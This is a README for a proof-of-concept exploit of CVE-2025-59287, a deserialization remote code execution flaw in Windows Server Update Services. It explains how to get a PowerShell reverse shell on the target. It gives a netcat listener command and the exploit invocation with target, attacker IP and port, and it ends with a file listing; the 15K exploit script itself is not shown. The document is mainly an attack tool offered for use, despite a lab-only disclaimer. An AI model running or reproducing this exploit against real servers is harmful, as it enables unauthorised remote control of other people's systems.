CVE-2025-59287# CVE-2025-59287
WSUS CVE-2025-59287 – XML Deserialization RCE (Reverse Shell)
A focused PoC to exploit WSUS CVE-2025-59287 via XML deserialization to achieve a Windows reverse shell. This script only supports a reverse shell payload (no calc fallback).
Target: Windows Server with WSUS role
Technique: SOAP + ObjectDataProvider deserialization
Result: cmd.exe launches PowerShell reverse shell to your listener
Disclaimer
For authorized testing in lab environments only. You are responsible for complying with all applicable laws.
Requirements
Python 3.x
Network access to WSUS endpoints (usually 8530/8531)
Listener on your machine (e.g., nc)
# Start listener
nc -lvnp 4444
# Run exploit
python3 my-CVE-2025-59287.py -u http://TARGET:8531 -l YOUR_IP -p 4444 --debug
-u: WSUS base URL (http/https, typically port 8530/8531)
-l: Your IP to receive the shell
-p: Your listener port
--debug: Verbose output
[4.0K] /data/pocs/cff6ca0c68635408429edbf8a2dfd1adeec34f06
├── [ 15K] CVE-2025-59287.py
└── [ 911] README.md
1 directory, 2 files